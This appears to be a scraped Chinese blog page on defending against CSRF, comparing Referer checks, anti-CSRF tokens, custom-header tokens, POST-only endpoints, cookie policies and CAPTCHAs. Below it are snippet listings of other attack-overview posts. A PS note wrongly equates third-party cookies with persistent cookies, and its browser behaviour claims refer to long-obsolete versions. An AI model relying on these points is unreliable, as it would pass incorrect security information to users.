            这种方法的显而易见的好处就是简单易行,网站的普通开发人员不需要操心 CSRF 的漏洞,只需要在最后给所有安全敏感的请求统一增加一个拦截器来检查 Referer 的值就可以。特别是对于当前现有的系统,不需要改变当前系统的任何已有代码和逻辑,没有风险,非常便捷。

            然而,这种方法并非万无一失。Referer 的值是由浏览器提供的,虽然 HTTP 协议上有明确的要求,但是每个浏览器对于 Referer 的具体实现可能有差别,并不能保证浏览器自身没有安全漏洞。使用验证 Referer 值的方法,就是把安全性都依赖于第三方(即浏览器)来保障,从理论上来讲,这样并不安全。事实上,对于某些浏览器,比如 IE6 或 FF2,目前已经有一些方法可以篡改 Referer 值。如果 bank.example 网站支持 IE6 浏览器,黑客完全可以把用户浏览器的 Referer 值设为以 bank.example 域名开头的地址,这样就可以通过验证,从而进行 CSRF 攻击。

           即便是使用最新的浏览器,黑客无法篡改 Referer 值,这种方法仍然有问题。因为 Referer 值会记录下用户的访问来源,有些用户认为这样会侵犯到他们自己的隐私权,特别是有些组织担心 Referer 值会把组织内网中的某些信息泄露到外网中。因此,用户自己可以设置浏览器使其在发送请求时不再提供 Referer。当他们正常访问银行网站时,网站会因为请求没有 Referer 值而认为是 CSRF 攻击,拒绝合法用户的访问。

    (2)在请求地址中添加 token 并验证(Anti CSRF Token)

           1. 用户访问某个表单页面。

           2. 服务端生成一个Token,放在用户的Session中,或者浏览器的Cookie中。

           3. 在页面表单附带上Token参数。

           4. 用户提交请求后,服务端验证表单中的Token是否与用户Session(或Cookies)中的Token一致,一致为合法请求,不是则非法请求。

           这个Token的值必须是随机的,不可预测的。由于Token的存在,攻击者无法再构造一个带有合法Token的请求实施CSRF攻击。另外使用Token时应注意Token的保密性,尽量把敏感操作由GET改为POST,以form或AJAX形式提交,避免Token泄露。

          CSRF 攻击之所以能够成功,是因为黑客可以完全伪造用户的请求,该请求中所有的用户验证信息都是存在于 cookie 中,因此黑客可以在不知道这些验证信息的情况下直接利用用户自己的 cookie 来通过安全验证。要抵御 CSRF,关键在于在请求中放入黑客所不能伪造的信息,并且该信息不存在于 cookie 之中。可以在 HTTP 请求中以参数的形式加入一个随机产生的 token,并在服务器端建立一个拦截器来验证这个 token,如果请求中没有 token 或者 token 内容不正确,则认为可能是 CSRF 攻击而拒绝该请求。

            这种方法要比检查 Referer 要安全一些,token 可以在用户登陆后产生并放于 session 之中,然后在每次请求时把 token 从 session 中拿出,与请求中的 token 进行比对,但这种方法的难点在于如何把 token 以参数的形式加入请求。对于 GET 请求,token 将附在请求地址之后,这样 URL 就变成 http://url?csrftoken=tokenvalue。 而对于 POST 请求来说,要在 form 的最后加上 <input type=”hidden” name=”csrftoken” value=”tokenvalue”/>,这样就把 token 以参数的形式加入请求了。但是,在一个网站中,可以接受请求的地方非常多,要对于每一个请求都加上 token 是很麻烦的,并且很容易漏掉,通常使用的方法就是在每次页面加载时,使用 javascript 遍历整个 dom 树,对于 dom 中所有的 a 和 form 标签后加入 token。这样可以解决大部分的请求,但是对于在页面加载之后动态生成的 html 代码,这种方法就没有作用,还需要程序员在编码时手动添加 token。

             该方法还有一个缺点是难以保证 token 本身的安全。特别是在一些论坛之类支持用户自己发表内容的网站,黑客可以在上面发布自己个人网站的地址。由于系统也会在这个地址后面加上 token,黑客可以在自己的网站上得到这个 token,并马上就可以发动 CSRF 攻击。为了避免这一点,系统可以在添加 token 的时候增加一个判断,如果这个链接是链到自己本站的,就在后面添加 token,如果是通向外网则不加。不过,即使这个 CSRF token 不以参数的形式附加在请求之中,黑客的网站也同样可以通过 Referer 来得到这个 token 值以发动 CSRF 攻击。这也是一些用户喜欢手动关闭浏览器 Referer 功能的原因。

     (3)在 HTTP 头中自定义属性并验证

            这种方法也是使用 token 并进行验证,和上一种方法不同的是,这里并不是把 token 以参数的形式置于 HTTP 请求之中,而是把它放到 HTTP 头中自定义的属性里。通过 XMLHttpRequest 这个类,可以一次性给所有该类请求加上 csrftoken 这个 HTTP 头属性,并把 token 值放入其中。这样解决了上种方法在请求中加入 token 的不便,同时,通过 XMLHttpRequest 请求的地址不会被记录到浏览器的地址栏,也不用担心 token 会透过 Referer 泄露到其他网站中去。

    然而这种方法的局限性非常大。XMLHttpRequest 请求通常用于 Ajax 方法中对于页面局部的异步刷新,并非所有的请求都适合用这个类来发起,而且通过该类请求得到的页面不能被浏览器所记录下,从而进行前进,后退,刷新,收藏等操作,给用户带来不便。另外,对于没有进行 CSRF 防护的遗留系统来说,要采用这种方法来进行防护,要把所有请求都改为 XMLHttpRequest 请求,这样几乎是要重写整个网站,这代价无疑是不能接受的。

     

    其他防御方法:

    1. 尽量使用POST,限制GET

            GET接口太容易被拿来做CSRF攻击,看第一个示例就知道,只要构造一个img标签,而img标签又是不能过滤的数据。接口最好限制为POST使用,GET则无效,降低攻击风险。

    当然POST并不是万无一失,攻击者只要构造一个form就可以,但需要在第三方页面做,这样就增加暴露的可能性。

    2. 浏览器Cookie策略

            IE6、7、8、Safari会默认拦截第三方本地Cookie(Third-party Cookie)的发送。但是Firefox2、3、Opera、Chrome、Android等不会拦截,所以通过浏览器Cookie策略来防御CSRF攻击不靠谱,只能说是降低了风险。

            PS:Cookie分为两种,Session Cookie(在浏览器关闭后,就会失效,保存到内存里),Third-party Cookie(即只有到了Exprie时间后才会失效的Cookie,这种Cookie会保存到本地)。

            PS:另外如果网站返回HTTP头包含P3P Header,那么将允许浏览器发送第三方Cookie。

    3. 加验证码

            验证码,强制用户必须与应用进行交互,才能完成最终请求。在通常情况下,验证码能很好遏制CSRF攻击。但是出于用户体验考虑,网站不能给所有的操作都加上验证码。因此验证码只能作为一种辅助手段,不能作为主要解决方案。

     

    参考链接:

    https://blog.csdn.net/stpeace/article/details/53512283

     

     

     

    展开全文
  • 常见网络攻击类型

    万次阅读 2017-09-14 11:37:17
    最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击. 根据相关技术原理,SQL注入可以分为平台层注入和代码...
  • 【期末复习】网络攻击与防御

    千次阅读 2019-01-05 23:16:21
    网络攻击技术 一、隐藏攻击者的地址和身份 1.IP地址欺骗或盗用技术:源IP地址为假冒或虚假 2.MAC地址盗用技术:修改注册表或使用ifconfig命令  3.通过Proxy隐藏技术:作为攻击跳板;实际上很难真正实现隐藏 ...
  • 常用网络攻击

    千次阅读 2018-04-26 10:59:40
    这个攻击是和sql数据库相关的(关系型数据库). 系统的解释一下: sql 注入: 指的是攻击者注入一段恶意的脚本, 然后执行他想要的结果。 比如: 获取到该db 里面所有的数据,删除数据库数据.(由于, 后台给前台开放的接口...
  • 浅谈常见网络攻击以及防御

    千次阅读 2019-06-11 15:57:08
    常见的网络攻击主要有xss攻击,csrf攻击和sql注入等。 一、XSS,即 Cross Site Script,中译是跨站脚本攻击。 XSS 攻击是指攻击者在网站上注入恶意的客户端代码,从而在用户使用浏览器进行访问时,获得用户隐私...
  • 网络攻击

    2018-06-02 11:51:17
    网络攻击的方式:第一个是端口攻击,通过扫描端口的漏洞来进行攻击第二个是拒绝服务攻击,通过发送大量的信息来使网站瘫痪第三个是提权攻击,通过一个没有权限或者是权限很低的user用户做一些动作,绕过一些验证或者...
  • 常见网络攻击原理及其防御

    千次阅读 2019-02-22 18:44:16
    常见的网络攻击,按照osi七层协议,可以分为: 1,物理层 线路侦听 2,数据链路层 mac_flood 3,网络层 arp_poison,icmp_redirection 4,传输层 tcp_flood(包含ack_flood和syn_flood),udp_flood(ntp,dns) 7,应用...
  • 常见的网络攻击攻防方法

    万次阅读 多人点赞 2017-09-19 14:58:37
    常见的网络攻击,按照osi七层协议,可以分为: 1,物理层 线路侦听 2,数据链路层 mac_flood 3,网络层 arp_poison,icmp_redirection 4,传输层 tcp_flood(包含ack_flood和syn_flood),udp_flood(ntp,dns) 7,...
  • 常见网络攻击手段及原理分析

    万次阅读 多人点赞 2018-07-04 17:28:17
    TCP SYN拒绝服务攻击 我们知道,一般情况下,一个TCP连接的建立需要经过三次握手的过程,即: 1、 建立发起者向目标计算机发送一个TCP SYN报文; 2、目标计算机收到这个SYN报文后,在内存中创建TCP连接控制块...
  • 无线网络攻击类型及防范

    千次阅读 2016-01-03 13:27:24
    无线网络攻击类型及防范1.无线中间人欺骗攻击 中间人欺骗:mitmap扫描。*MITM:man in theMiddle,中间人攻击。在目标主机与另一方主机 (网关或服务器)进行正常连接的过程中,攻击者通过拦截、插入、伪造、中断的...
  • 网络攻击主要方式

    千次阅读 2007-10-08 10:51:00
    网络攻击的方式要分为四类: 第一类是服务拒绝攻击,包括死亡之ping(ping of death)、泪滴(teardrop)、UDP洪水(UDP flood)、SYN洪水(SYN flood)、Land攻击、Smurf攻击、Fraggle攻击、
  • 网络攻击主要技术和手段

    千次阅读 2015-03-17 19:59:48
    分布式拒绝服务是在传统DOS攻击基础上产生的,该方法通过占领傀儡机来实施,将多计算机联合起来作为攻击平台,对一或多目标发动DOS攻击,从而成倍地提高拒绝服务攻击的威力。 (2)入侵攻击。入侵者的入侵...
  • 网络安全------网络攻击分类

    万次阅读 2014-09-30 10:46:36
    读取攻击主要包含所有从受害者哪里获取信息的相关攻击。此类攻击会从获取组织结构的ip地址,在那些地址范围内进行端口扫描和漏洞弱点扫描,最后到入侵有弱点的主机获取信息。 1.侦察(reconnaissance recon)攻击:...
  • 网络攻击方法分析与防范措施

    万次阅读 2018-05-13 13:42:04
    推荐阅读(仅仅三页内容):常见网络攻击手段分析及防御原理 一网站建立以后,如果不注意安全方面的问题,很容易被人攻击,下面我就总结几种常见的漏洞的简介与攻击原理分析 前奏: 什么是网络安全 ...
  • 网络攻击类型及应对策略

    千次阅读 2016-03-07 15:58:48
    网络将数以千万计的机器连接在一起,环境复杂多变,所以网络攻击也是花样百出。这里,根据攻击对消息产生的影响,主要可以划分为三类:窃听、篡改、仿冒。这三种攻击方式,分别会破坏消息的私密性、完整性和通信双方...
  • 四大网络攻击常见手段及防护

    万次阅读 2012-09-25 17:53:19
    作为企业终端用户,有必要了解网络攻击者常用的手段,对于本地网络和终端防护来说很有必要。下面就讲解一下网络中黑客常用的攻击方法。  一、DoS攻击  这可不是用DoS操作系统攻击,其全称为Denial of ...
  • 网络攻击介绍

    千次阅读 2019-05-16 16:53:43
    网络攻击(Cyberattack,也译为赛博攻击)是指针对计算机信息系统、基础设施、计算机网络或个人计算机设备的,任何类型的进攻动作。 于计算机和计算机网络中,破坏、揭露、修改、使软件或服务失去功能、在没有得到...
  • 一、网络安全内容 、 二、网络攻击 、 三、被动攻击 与 主动攻击 、 、分布式拒绝服务 DDos 、 五、恶意程序 、 六、计算机网络安全目标 、 七、Cain 网络攻击原理 、
  • 10种防止网络攻击的方法

    千次阅读 2018-12-25 21:43:09
    10种防止网络攻击的方法 随着威胁形势的不断发展,建立全面的网络安全解决方案需要外围安全性和主动的网内防御 。随着网络攻击的范围,规模和频率不断增加,网络卫生正变得越来越重要。与个人卫生相似,网络卫生是指...
  • 网络安全第五讲 网络攻击技术分析

    千次阅读 多人点赞 2020-10-24 17:06:30
    网络信息安全第五讲 网络攻击技术分析 按照攻击目的,可将攻击分为破坏型和入侵型两种类型。 破坏型攻击以破坏目标为目的,但攻击者不能随意控制目标的系统资源。 入侵型攻击以控制目标为目的,比破坏型攻击威胁更...
  • 网络攻击方法及工具

    千次阅读 2019-05-14 09:39:14
    网络攻击方法及工具 文章目录网络攻击方法及工具攻击方法网络监听sniffer口令破解字典文件拒绝服务攻击服务器端口攻击同步包风暴smurf攻击利用处理程序错误pingofdeathTeardropwinnukeLand电子邮件轰炸低速率拒绝...
  • 网络攻击与防御期末考试知识点

    千次阅读 2018-03-16 10:53:11
     网络安全构成威胁的因素:l 环境因素,l 人为因素和l 系统自身因素(硬件软件协议的缺陷与漏洞),其中人为因素包括:恶意的(恶意攻击、违纪、违法和犯罪)和无意的(如工作疏忽造成失误、配置不当等)4....
  • 网络攻击分类(五类)

    千次阅读 2018-10-23 14:24:34
    一:被动攻击 被动攻击是对信息的保密性进行攻击,窃取信息的来源以及数据,对信息加以查看。主要攻击方式有窃听,嗅探等。对被动攻击采取的防范措施应该是阻止而不是检测。比如进行数据加密。 二:主动攻击 ...
  • 常见网络攻击案例

    千次阅读 2018-11-30 08:27:13
    1. tcp半链接攻击 tcp半链接攻击也称为:SYN Flood (SYN洪水),是种典型的DoS (Denial of Service,拒绝服务) 攻击,效果就是服务器TCP连接资源耗尽,停止响应正常的TCP连接请求 1.1 正常链接时的情况 1.2 半...
  • 常见tcp/ip网络攻击方式分析

    千次阅读 2018-03-26 02:23:20
    常见网络攻击方式介绍 一、 TCP SYN 拒绝服务攻击 二、 ICMP 洪水 三、 UDP 洪水 、 端口扫描 五、 分片 IP 报文攻击 六、 SYN 比特和 FIN 比特同时设置 七、 没有设置任何标志的 TCP 报文攻击 八、 设置了 FIN ...
  • 网络攻击行为分析

    2019-06-22 22:15:12
    1、网络攻击行为过程分析-步骤 攻击准备 破坏型攻击指的破坏目标,使其不能正常工作,而不是控制目标系统的运行 入侵型攻击,这种攻击是要获得一定的权限达到控制攻击目标或者窃取信息的目的 攻击实施 破坏性...
  • 网络攻击知识之几种IP地址攻击方式

    千次阅读 2015-09-29 11:52:31
    网络攻击知识之几种IP地址攻击方式 作者:hackmaster 来源:赛迪网安全社区     1.OOB攻击 这是利用NETBIOS中一OOB (Out of Band)的漏洞而来进行的,它的原理是通过TCP/IP协议传递一数据包到计算机...

空空如也

1 2 3 4 5 ... 20
收藏数 256,847
精华内容 102,738
关键字:

网络攻击